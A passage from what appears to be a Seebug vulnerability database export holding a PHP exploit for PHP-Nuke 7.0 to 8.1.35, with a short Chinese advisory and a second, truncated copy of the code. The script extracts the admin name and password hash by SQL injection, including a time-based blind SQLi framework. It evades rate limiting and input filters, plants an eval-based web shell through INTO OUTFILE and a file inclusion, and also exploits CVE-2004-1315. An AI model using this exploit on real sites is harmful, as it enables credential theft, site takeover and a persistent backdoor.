$size=strlen($string);\r\n for($x=0;$x<$size;$x++){\r\n $char.=ord($string[$x]).",";\r\n }\r\n $char[strlen($char)-1]=")%00";\r\n return $char;\r\n }\r\n}\r\n//General purpose http client that works on a default php install. \r\nclass http_client{\r\n var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';\r\n function send($loc){\r\n //overload function polymorphism between gets and posts\r\n $url=parse_url($loc);\r\n if(!isset($url['port'])){\r\n $url['port']=80;\r\n }\r\n $ua='Firefox';\r\n if($this->proxy_ip!=''&&$this->proxy_port!=''){\r\n $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );\r\n $url['path']=$url['host'].':'.$url['port'].$url['path'];\r\n }else{\r\n $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );\r\n }\r\n if( !$fp ) {\r\n print "$errstr ($errno)<br>\\nn";\r\n return false;\r\n } else {\r\n if( $this->postdata=='' ) {\r\n $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n";\r\n } else {\r\n $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n";\r\n }\r\n if($this->proxy_name!=''&&$this->proxy_pass!=''){\r\n $request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\\r\\n\\r\\n";\r\n }\r\n $request.="Host: ".$url['host'].":".$url['port']."\\r\\n";\r\n $request.="User-Agent: ".$ua."\\r\\n";\r\n $request.="Accept: text/plain\\r\\n";\r\n if($this->referer!=''){\r\n $request.="Referer: ".$this->referer."\\r\\n";\r\n }\r\n $request.="Connection: Close\\r\\n";\r\n if($this->cookie!=''){\r\n $request.="Cookie: ".$this->cookie."\\r\\n" ;\r\n }\r\n if( $this->postdata!='' ) {\r\n $strlength = strlen( $this->postdata );\r\n $request.="Content-type: application/x-www-form-urlencoded\\r\\n" ;\r\n $request.="Content-length: ".$strlength."\\r\\n\\r\\n";\r\n $request.=$this->postdata;\r\n }\r\n fputs( $fp, $request."\\r\\n\\r\\n" );\r\n while( !feof( $fp ) ) {\r\n $output .= fgets( $fp, 1024 );\r\n }\r\n fclose( $fp );\r\n //php_nuke only:\r\n if(strstr($output,"too many page loads")){\r\n print "REQUEST CAP HIT!\\n";\r\n print_r(debug_backtrace());\r\n print "REQUEST CAP HIT!\\n";\r\n die();\r\n }\r\n return $output;\r\n }\r\n }\r\n //Use a http proxy\r\n function proxy($proxy){ //user:pass@ip:port\r\n $proxyAuth=explode('@',$proxy);\r\n if(isset($proxyAuth[1])){\r\n $login=explode(':',$proxyAuth[0]);\r\n $this->proxy_name=$login[0];\r\n $this->proxy_pass=$login[1];\r\n $addr=explode(':',$proxyAuth[1]);\r\n }else{\r\n $addr=explode(':',$proxy);\r\n }\r\n\t $this->proxy_ip=$addr[0];\r\n $this->proxy_port=$addr[1];\r\n }\r\n //Parses the results from a PHP error to use as a path disclosure.\r\n function getPath($url,$pops=1){\r\n $html=$this->send($url);\r\n //Regular error reporting:\r\n $resp=explode("array given in <b>",$html);\r\n if(isset($resp[1])){\r\n $resp = explode("</b>",$resp[1]);\r\n }else{\r\n //xdebug's error reporting:\r\n $resp=explode("array given in ",$html);\r\n if(isset($resp[1])){\r\n $resp = explode(" ",$resp[1]);\r\n }else{\r\n $resp[0]=false;\r\n }\r\n }\r\n $path=$resp[0];\r\n //Can't use dirname()\r\n if(strstr($path,"\\\\")){\r\n $p=explode("\\\\",$path);\r\n for($x=0;$x<$pops;$x++){\r\n array_pop($p);\r\n }\r\n $path=implode("\\\\",$p);\r\n }else{\r\n $p=explode("/",$path);\r\n for($x=0;$x<$pops;$x++){\r\n array_pop($p);\r\n }\r\n $path=implode("/",$p);\r\n }\r\n return $path;\r\n }\r\n //Grab the server type from the http header.\r\n function getServer($url){\r\n $resp=$this->send($url);\r\n $header=explode("Server: ",$resp);\r\n $server=explode("\\n",$header[1]);\r\n return $server[0];\r\n }\r\n}\r\nfunction main(){\r\n $user_input=getopt("t:c:a:");\r\n if($user_input['t']){\r\n $attack_url=$user_input['t'];\r\n if($user_input['c']){\r\n $user_cookie=$user_input['c'];\r\n }\r\n //This is only useful for debugging, so its not listed in the useage.\r\n if($user_input['a']){\r\n $admin_cookie=$user_input['a'];\r\n }\r\n }else{\r\n print("Useage: ./php_exploit -t http://localhost\\n");\r\n die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n");\r\n }\r\n $attack_url=str_replace("index.php","",$attack_url);\r\n $http=new http_client();\r\n $sex=new php_nuke_blind_sql_injection($attack_url."/");\r\n if(!$admin_cookie){\r\n\t //This is what a cookie looks like:\r\n\t //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096\r\n\t //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";\r\n\t if($user_cookie){\r\n print "Using cookie...\\n";\r\n $http->cookie=$user_cookie;\r\n //1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.\r\n //This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.\r\n $http->postdata="title=wow\\\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n //This part of the exploit is a bit strange sorry for the mess, gotta realease!\r\n if(strstr($response,"javascript:history.go(-1)")){\r\n //magic_quotes_gpc=on\r\n $http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n $http->postdata='';\r\n //Find the primary key of the journal entry we just created.\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n //we should have the single quote that we escaped at the end of wow'\r\n $jid=explode("\\">wow<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);\r\n if(strpos($response,"31337")){\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response);\r\n $aid=explode("<",$aid);\r\n $pwd=explode("<",$pwd);\r\n $user_name=$aid[0];\r\n $pass_hash=$pwd[0];\r\n }else{\r\n //magic_quotes_gpc=off\r\n sleep(3);\r\n $http->postdata="title=wow\\\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n sleep(2);\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n $jid=explode("\\">wow<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n $jid=explode("\\">",$jid[1]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);\r\n $inj=explode("Last updated on ",$response);\r\n $inj=explode(" @ ",$inj[1]);\r\n $pass_hash=$inj[0];\r\n $inj=explode("<",$inj[1]);\r\n $user_name=$inj[0];\r\n }\r\n }else{\r\n $http->postdata='';\r\n //Find the primary key of the journal entry we just created.\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n //we should have the single quote that we escaped at the end of wow'\r\n $jid=explode("\\">wow',<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);\r\n if(!strpos($response,"31337")){\r\n die("target has patched!\\n");\r\n }else{\r\n print "Target vulnerable to a privilege escalation attack!!!\\n";\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response);\r\n $aid=explode("<",$aid);\r\n $pwd=explode("<",$pwd);\r\n $user_name=$aid[0];\r\n $pass_hash=$pwd[0];\r\n }\r\n }\r\n\t }else{\r\n $sex->sleep="sleep(5)";\r\n print "Starting Attack Against:".$attack_url."/\\n";\r\n print "Testing for blind sql injection...\\n";\r\n if(!$sex->test_target()){\r\n print("Target might be running 8.1.35\\n");\r\n print("Try the privilege esciation attack to upload the shell:");\r\n die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n");\r\n }\r\n print "Target is vulnerable to blind sql injection!!!\\n";\r\n print "Please Standby For Attack...\\n";\r\n $pass_hash=$sex->find_md5("pwd");\r\n $user_name=$sex->find_string("aid");\r\n print "attacked used:".$sex->request_count." requests.\\n";\r\n\t }\r\n\t print "Found Admin's name:".$user_name."\\n";\r\n\t print "Found MD5 Password hash:".$pass_hash."\\n";\r\n\t $admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";\r\n }\r\n print "Using Admin Session ID:\\n".$admin_cookie."\\n";\r\n $http->cookie=$admin_cookie;\r\n //ipban.php\r\n sleep(3);\r\n //This request will tell us what version of php-nuke it is.\r\n //If it is 8, Then the page gives us configuration information to perserve.\r\n $admin_options=$http->send($attack_url."/admin.php?op=general");\r\n if(!strstr($admin_options,"Content-Length: 0")){\r\n print "PHP-Nuke 8 detected.\\n";\r\n $option_values=explode("value='",$admin_options);\r\n $x=0;\r\n array_shift($option_values);\r\n //Parsing out and storing configuration values to restore them after the hack. \r\n foreach( $option_values as $value){\r\n $value=explode("'",$value);\r\n $values[]=urlencode($value[0]);\r\n if($x++==4)\r\n break;\r\n }\r\n //ipban.php\r\n sleep(2);\r\n //Enable error reporting\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";\r\n $error_reporting=$http->send($attack_url."/admin.php");\r\n //Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].\r\n $http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";\r\n $remote_path=$http->getPath($attack_url."/admin.php",3);\r\n sleep(2);\r\n if(strstr($remote_path,':\\\\')){\r\n print "Windows box detected.\\n";\r\n print "Remote path:$remote_path\\n";\r\n print "Uploading backdoor...\\n";\r\n $remote_path=addslashes(addslashes($remote_path."\\\\frontend.php"));\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';\r\n //Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.\r\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");\r\n $re=$http->send($attack_url."/admin.php?op=modifyUser");\r\n //Disable error reporting\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";\r\n $error_reporting=$http->send($attack_url."/admin.php");\r\n }else{\r\n print "*nix box detected.\\n";\r\n print "Remote path:$remote_path\\n";\r\n //Is mysql on the same machine as the httpd?\r\n sleep(2);\r\n $http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");\r\n $mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");\r\n if(strstr($mysql_check,"User Doesn't Exists!")){\r\n print("MySQL isn't on the same machine or you do not have file privileges.\\n");\r\n die("Remote code execution failed\\n");\r\n }\r\n print "Uploading backdoor...\\n";\r\n //ipban.php\r\n sleep(2);\r\n //Grab the theme, this is needed to repair the database after the LFI\r\n $theme=$http->send($attack_url."/admin.php?op=themes");\r\n $theme=explode('src="themes/',$theme);\r\n $theme=explode('/images/',$theme[1]);\r\n //Repair the database after the LFI.\r\n $backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';\r\n //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';\r\n //Install the backdoor in a relitive directory.\r\n $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';\r\n //charEncode is used to bypass XSS filters.\r\n\t //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");\r\n $http->send($attack_url."/admin.php?op=modifyUser");\r\n sleep(2);\r\n //local file include vulnerablity to execute /tmp/theme.php\r\n $http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";\r\n $http->send($attack_url."/admin.php");\r\n sleep(2);\r\n $http->postdata='';\r\n //Fire off a get request to trigger the uploaded php file using LFI\r\n $http->send($attack_url);\r\n sleep(2);\r\n //Try the LFI again, just in case.\r\n $http->send($attack_url."/admin.php");\r\n }\r\n sleep(2);\r\n //test if the backdoor works, try and clean up after the exploit.\r\n $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));\r\n if(strstr($test_backdoor,"31337")){\r\n print "Remote Code execution tested successfully:\\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\\n";\r\n }else{\r\n print "Backdoor install failed!\\n";\r\n }\r\n }else{\r\n ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.\r\n print "PHP-Nuke 7 detected.\\n";\r\n $http->postdata="";//send get requests.\r\n //Fire off a check for CVE-2004-1315, phpbb maybe installed. \r\n //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527\r\n //php-nuke was not vulnerable to this because of mainfile line 50: \\([^>]*"?[^)]*\\)\r\n //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527\r\n $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");\r\n //if the exploit didn't work, then we might have to enable phpbb and populate it.\r\n if(!strstr($try_exploit,"20041315")){\r\n //Enalbe PHPBB\r\n $http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");\r\n //create a new category for phpbb\r\n $http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";\r\n $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");\r\n //ipban.php\r\n sleep(2);\r\n //create a new form in the new category\r\n $http->postdata="forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";\r\n $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");\r\n $http->postdata="forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";\r\n $http->send($attack_url."/modules/Forums/admin/admin_forums.php?");\r\n //create a new topic in the new form\r\n $http->postdata="username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";\r\n $http->send($attack_url."/modules.php?name=Forums&file=posting");\r\n //ipban.php\r\n sleep(2);\r\n //access the first topic.\r\n $http->postdata="";\r\n //Check to see if any of the first 10 topics are exploitable.\r\n for($t=1;$t<10&&!strstr($try_exploit,"20041315");$t++){\r\n //Fire off a check for CVE-2004-1315.\r\n $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");\r\n }\r\n }\r\n //Check if we where able to hit CVE-2004-1315.\r\n if(strstr($try_exploit,"20041315")){\r\n print("Remote Code execution tested successfully:\\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\\nThis is a Doulbe urlencode()\\n");\r\n }else{\r\n print("Remote code execution has failed!\\n");\r\n }\r\n }\r\n}\r\nmain();\r\n?>\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-68531"}, {"lastseen": "2017-11-19T18:11:54", "description": "BUGTRAQ ID: 39922\r\n\r\nPHP-Nuke\u662f\u4e00\u4e2a\u5e7f\u4e3a\u6d41\u884c\u7684\u7f51\u7ad9\u521b\u5efa\u548c\u7ba1\u7406\u5de5\u5177\uff0c\u53ef\u4f7f\u7528\u5f88\u591a\u6570\u636e\u5e93\u8f6f\u4ef6\u4f5c\u4e3a\u540e\u7aef\uff0c\u5982MySQL\u3001PostgreSQL\u3001mSQL\u3001 Interbase\u3001Sybase\u7b49\u3002\r\n\r\nPHP-Nuke\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9/modules/Journal/savenew.php\u9875\u9762\u7684mood\u53d8\u91cf\uff0c\u4ee5\u53ca\u63d0\u4ea4\u7ed9/modules /Your_Account/admin/index.php\u9875\u9762\u7684chng_user\u53d8\u91cf\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u67e5\u8be2\u8bf7\u6c42\u6267\u884cSQL\u6ce8\u5165\u653b\u51fb\uff0c\u5b8c\u5168\u5165\u4fb5\u6570\u636e\u5e93\u7cfb\u7edf\u3002\n\nPHP-Nuke PHP-Nuke 8.1.35\r\nPHP-Nuke PHP-Nuke 8.1\r\nPHP-Nuke PHP-Nuke 7.0\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP-Nuke\r\n--------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://phpnuke.org/", "published": "2010-05-08T00:00:00", "type": "seebug", "title": "PHP-Nuke\u591a\u4e2aSQL\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2010-05-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19573", "id": "SSV:19573", "sourceData": "\n #!/usr/bin/php \r\n\r\n<?php \r\n\r\nset_time_limit(0); \r\n\r\n//The blind_sql_injeciton calss is a general exploit framework that we are inheriting. \r\n\r\nclass php_nuke_blind_sql_injection extends blind_sql_injection { \r\n\r\n //This is the blind sql injection request. \r\n\r\n function query($check){ \r\n\r\n //Rate limiter to bypass ipban.php's protection. \r\n\r\n //Must stay below 5 requests every 2 seconds. \r\n\r\n if(!($this->request_count%4)){ \r\n\r\n sleep(2); \r\n\r\n } \r\n\r\n //build the http request to Inject a query: \r\n\r\n //This is a simple get request with a custom referer \r\n\r\n //$this->set_referer("'="/\\*" (select ".$check." from nuke_authors limit 1))-- */"); \r\n\r\n $this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1"); \r\n\r\n /*example get and post request. \r\n\r\n *$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id] \r\n\r\n *$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id] \r\n\r\n */\r\n\r\n } \r\n\r\n} \r\n\r\n//This is a very efficient blind sql injection class. \r\n\r\nclass blind_sql_injection{ \r\n\r\n var $url, $backup_url, $result, $http, $request_count, $timeout; \r\n\r\n function blind_sql_injection($url,$timeout=10){ \r\n\r\n $this->request_count=0; \r\n\r\n $this->url=$url; \r\n\r\n $this->backup_url=$url; \r\n\r\n $this->http=new http_client(); \r\n\r\n $this->timeout=$timeout; \r\n\r\n } \r\n\r\n function set_get($get){ \r\n\r\n $this->url=$this->url."?".$get; \r\n\r\n } \r\n\r\n function set_referer($referer){ \r\n\r\n $this->http->referer=$referer; \r\n\r\n } \r\n\r\n function set_post($post){ \r\n\r\n $this->http->postdata=$post; \r\n\r\n } \r\n\r\n function test_target(){ \r\n\r\n return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)"); \r\n\r\n } \r\n\r\n function num_to_hex($arr){ \r\n\r\n $ret=''; \r\n\r\n foreach($arr as $a){ \r\n\r\n if($a<=9){ \r\n\r\n $ret.=$a; \r\n\r\n }else{ \r\n\r\n $ret.=chr(87+$a); \r\n\r\n } \r\n\r\n } \r\n\r\n return $ret; \r\n\r\n } \r\n\r\n //Looking for a string of length 32 and base 16 in ascii chars. \r\n\r\n function find_md5($column){ \r\n\r\n return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)")); \r\n\r\n } \r\n\r\n function find_sha1($column){ \r\n\r\n return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)")); \r\n\r\n } \r\n\r\n //Look for an ascii string of arbitrary length. \r\n\r\n function find_string($column){ \r\n\r\n $ret=''; \r\n\r\n //A length of zero means we are looking for a null byte terminated string. \r\n\r\n $result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))"); \r\n\r\n foreach($result as $r){ \r\n\r\n $ret.=chr($r); \r\n\r\n } \r\n\r\n return $ret; \r\n\r\n } \r\n\r\n //query() is a method that generates the sql injection request \r\n\r\n function query($check){ \r\n\r\n //This function must be overridden. \r\n\r\n } \r\n\r\n function recheck($result,$question,$base){ \r\n\r\n $this->bin_finder($base,1,$question,$start); \r\n\r\n //Force a long timeout. \r\n\r\n $tmp_timeout=$this->timeout; \r\n\r\n if($this->timeout<10){ \r\n\r\n $this->timeout=10; \r\n\r\n }else{ \r\n\r\n $this->timeout=$this->timeout*2; \r\n\r\n } \r\n\r\n $l=1; \r\n\r\n foreach($result as $r){ \r\n\r\n if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){ \r\n\r\n $result[]=$b; \r\n\r\n break; \r\n\r\n } \r\n\r\n $l++; \r\n\r\n } \r\n\r\n $this->timeout=$tmp_timeout; \r\n\r\n } \r\n\r\n function linear_finder($base,$length,$question){ \r\n\r\n for($l=1;$l<=$length;$l++){ \r\n\r\n for($b=0;$b<$base;$b++){ \r\n\r\n if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){ \r\n\r\n $result[]=$b; \r\n\r\n break; \r\n\r\n } \r\n\r\n } \r\n\r\n } \r\n\r\n } \r\n\r\n #Binary search for mysql based sql injection. \r\n\r\n function bin_finder($base,$length,$question){ \r\n\r\n $start_pos=1; \r\n\r\n $result=''; \r\n\r\n for($cur=$start_pos;$cur<=$length||$length==0;$cur++){ \r\n\r\n $n=$base-1; \r\n\r\n $low=0; \r\n\r\n $floor=$low; \r\n\r\n $high=$n-1; \r\n\r\n $pos= $low+(($high-$low)/2); \r\n\r\n $found=false; \r\n\r\n while($low<=$high&&!$found){ \r\n\r\n #asking the sql database if the current value is greater than $pos\r\n\r\n if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){ \r\n\r\n #if this is true then the value must be the modulus. \r\n\r\n if($pos==$n-1){ \r\n\r\n $result[]=$pos+1; \r\n\r\n $found=true; \r\n\r\n }else{ \r\n\r\n $low=$pos+1; \r\n\r\n } \r\n\r\n #asking the sql database if the current value is less than $pos\r\n\r\n }else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){ \r\n\r\n #if this is true the value must be zero, or in the case of ascii, a null byte. \r\n\r\n if($pos==$floor+1){ \r\n\r\n $found=true; \r\n\r\n #We have found the null terminator so we have finnished our search for a string. \r\n\r\n if($length==0){ \r\n\r\n $length=-1; \r\n\r\n }else{ \r\n\r\n $result[]=$pos-1; \r\n\r\n } \r\n\r\n }else{ \r\n\r\n $high=$pos-1; \r\n\r\n } \r\n\r\n }else{ \r\n\r\n #both greater than and less then where asked, so so then the answer is our guess $pos. \r\n\r\n $result[]=$pos; \r\n\r\n $found=true; \r\n\r\n } \r\n\r\n $pos=$low+(($high-$low)/2); \r\n\r\n } \r\n\r\n print("."); \r\n\r\n } \r\n\r\n return $result; \r\n\r\n } \r\n\r\n //Fire off the request \r\n\r\n function send($quesiton){ \r\n\r\n //build the injected query. \r\n\r\n $this->query($quesiton); \r\n\r\n $start=time(); \r\n\r\n $resp=$this->http->send($this->url); \r\n\r\n //backup_url is for set_get() \r\n\r\n $this->url=$this->backup_url; \r\n\r\n $this->request_count++; \r\n\r\n return (time()-$start>=$this->timeout); \r\n\r\n } \r\n\r\n //retroGod RIP \r\n\r\n function charEncode($string){ \r\n\r\n $char="char("; \r\n\r\n $size=strlen($string); \r\n\r\n for($x=0;$x<$size;$x++){ \r\n\r\n $char.=ord($string[$x]).","; \r\n\r\n } \r\n\r\n $char[strlen($char)-1]=")%00"; \r\n\r\n return $char; \r\n\r\n } \r\n\r\n} \r\n\r\n//General purpose http client that works on a default php install. \r\n\r\nclass http_client{ \r\n\r\n var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata=''; \r\n\r\n function send($loc){ \r\n\r\n //overload function polymorphism between gets and posts \r\n\r\n $url=parse_url($loc); \r\n\r\n if(!isset($url['port'])){ \r\n\r\n $url['port']=80; \r\n\r\n } \r\n\r\n $ua='Firefox'; \r\n\r\n if($this->proxy_ip!=''&&$this->proxy_port!=''){ \r\n\r\n $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 ); \r\n\r\n $url['path']=$url['host'].':'.$url['port'].$url['path']; \r\n\r\n }else{ \r\n\r\n $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 ); \r\n\r\n } \r\n\r\n if( !$fp ) { \r\n\r\n print "$errstr ($errno)<br>\\nn"; \r\n\r\n return false; \r\n\r\n } else { \r\n\r\n if( $this->postdata=='' ) { \r\n\r\n $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n"; \r\n\r\n } else { \r\n\r\n $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n"; \r\n\r\n } \r\n\r\n if($this->proxy_name!=''&&$this->proxy_pass!=''){ \r\n\r\n $request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\\r\\n\\r\\n"; \r\n\r\n } \r\n\r\n $request.="Host: ".$url['host'].":".$url['port']."\\r\\n"; \r\n\r\n $request.="User-Agent: ".$ua."\\r\\n"; \r\n\r\n $request.="Accept: text/plain\\r\\n"; \r\n\r\n if($this->referer!=''){ \r\n\r\n $request.="Referer: ".$this->referer."\\r\\n"; \r\n\r\n } \r\n\r\n $request.="Connection: Close\\r\\n"; \r\n\r\n if($this->cookie!=''){ \r\n\r\n $request.="Cookie: ".$this->cookie."\\r\\n" ; \r\n\r\n } \r\n\r\n if( $this->postdata!='' ) { \r\n\r\n $strlength = strlen( $this->postdata ); \r\n\r\n $request.="Content-type: application/x-www-form-urlencoded\\r\\n" ; \r\n\r\n $request.="Content-length: ".$strlength."\\r\\n\\r\\n"; \r\n\r\n $request.=$this->postdata; \r\n\r\n } \r\n\r\n fputs( $fp, $request."\\r\\n\\r\\n" ); \r\n\r\n while( !feof( $fp ) ) { \r\n\r\n $output .= fgets( $fp, 1024 ); \r\n\r\n } \r\n\r\n fclose( $fp ); \r\n\r\n //php_nuke only: \r\n\r\n if(strstr($output,"too many page loads")){ \r\n\r\n print "REQUEST CAP HIT!\\n"; \r\n\r\n print_r(debug_backtrace()); \r\n\r\n print "REQUEST CAP HIT!\\n"; \r\n\r\n die(); \r\n\r\n } \r\n\r\n return $output; \r\n\r\n } \r\n\r\n } \r\n\r\n //Use a http proxy \r\n\r\n function proxy($proxy){ //user:pass@ip:port \r\n\r\n $proxyAuth=explode('@',$proxy); \r\n\r\n if(isset($proxyAuth[1])){ \r\n\r\n $login=explode(':',$proxyAuth[0]); \r\n\r\n $this->proxy_name=$login[0]; \r\n\r\n $this->proxy_pass=$login[1]; \r\n\r\n $addr=explode(':',$proxyAuth[1]); \r\n\r\n }else{ \r\n\r\n $addr=explode(':',$proxy); \r\n\r\n } \r\n\r\n $this->proxy_ip=$addr[0]; \r\n\r\n $this->proxy_port=$addr[1]; 